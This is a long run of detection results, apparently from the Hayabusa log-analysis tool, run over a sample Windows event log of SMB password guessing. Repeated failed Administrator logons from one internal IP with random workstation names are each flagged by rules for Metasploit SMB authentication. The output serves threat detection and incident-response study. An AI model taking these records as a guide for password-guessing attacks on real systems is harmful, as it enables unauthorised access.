13502016-09-20 01:50:12.536 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13512016-09-20 01:50:12.536 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13522016-09-20 01:50:12.582 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13532016-09-20 01:50:12.582 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13542016-09-20 01:50:12.623 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13552016-09-20 01:50:12.623 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13562016-09-20 01:50:12.660 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13572016-09-20 01:50:12.660 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13582016-09-20 01:50:12.707 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13592016-09-20 01:50:12.707 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13602016-09-20 01:50:12.745 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13612016-09-20 01:50:12.745 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13622016-09-20 01:50:12.772 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13632016-09-20 01:50:12.772 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13642016-09-20 01:50:12.811 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13652016-09-20 01:50:12.811 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13662016-09-20 01:50:12.847 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13672016-09-20 01:50:12.847 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13682016-09-20 01:50:12.891 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13692016-09-20 01:50:12.891 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13702016-09-20 01:50:12.927 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13712016-09-20 01:50:12.927 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13722016-09-20 01:50:12.963 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13732016-09-20 01:50:12.963 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13742016-09-20 01:50:12.996 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13752016-09-20 01:50:12.996 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13762016-09-20 01:50:13.045 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13772016-09-20 01:50:13.045 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13782016-09-20 01:50:13.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13792016-09-20 01:50:13.088 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13802016-09-20 01:50:13.125 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13812016-09-20 01:50:13.125 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13822016-09-20 01:50:13.156 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13832016-09-20 01:50:13.156 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13842016-09-20 01:50:13.195 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13852016-09-20 01:50:13.195 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13862016-09-20 01:50:13.236 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13872016-09-20 01:50:13.236 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13882016-09-20 01:50:13.280 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13892016-09-20 01:50:13.280 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13902016-09-20 01:50:13.324 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13912016-09-20 01:50:13.324 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13922016-09-20 01:50:13.364 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13932016-09-20 01:50:13.364 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13942016-09-20 01:50:13.412 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13952016-09-20 01:50:13.412 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13962016-09-20 01:50:13.447 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13972016-09-20 01:50:13.447 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13982016-09-20 01:50:13.487 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13992016-09-20 01:50:13.487 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14002016-09-20 01:50:13.528 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14012016-09-20 01:50:13.528 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14022016-09-20 01:50:13.564 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14032016-09-20 01:50:13.564 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14042016-09-20 01:50:13.612 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14052016-09-20 01:50:13.612 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14062016-09-20 01:50:13.652 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14072016-09-20 01:50:13.652 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14082016-09-20 01:50:13.683 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14092016-09-20 01:50:13.683 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14102016-09-20 01:50:13.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14112016-09-20 01:50:13.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14122016-09-20 01:50:13.759 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14132016-09-20 01:50:13.759 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14142016-09-20 01:50:13.796 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14152016-09-20 01:50:13.796 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14162016-09-20 01:50:13.834 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14172016-09-20 01:50:13.834 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14182016-09-20 01:50:13.860 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14192016-09-20 01:50:13.860 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14202016-09-20 01:50:13.895 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14212016-09-20 01:50:13.895 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14222016-09-20 01:50:13.935 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14232016-09-20 01:50:13.935 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14242016-09-20 01:50:13.976 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14252016-09-20 01:50:13.976 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14262016-09-20 01:50:14.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14272016-09-20 01:50:14.008 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14282016-09-20 01:50:14.052 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14292016-09-20 01:50:14.052 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14302016-09-20 01:50:14.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14312016-09-20 01:50:14.088 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14322016-09-20 01:50:14.124 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14332016-09-20 01:50:14.124 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14342016-09-20 01:50:14.159 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14352016-09-20 01:50:14.159 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14362016-09-20 01:50:14.189 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14372016-09-20 01:50:14.189 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14382016-09-20 01:50:14.228 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14392016-09-20 01:50:14.228 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14402016-09-20 01:50:14.304 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14412016-09-20 01:50:14.304 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14422016-09-20 01:50:14.345 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14432016-09-20 01:50:14.345 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14442016-09-20 01:50:14.389 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14452016-09-20 01:50:14.389 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
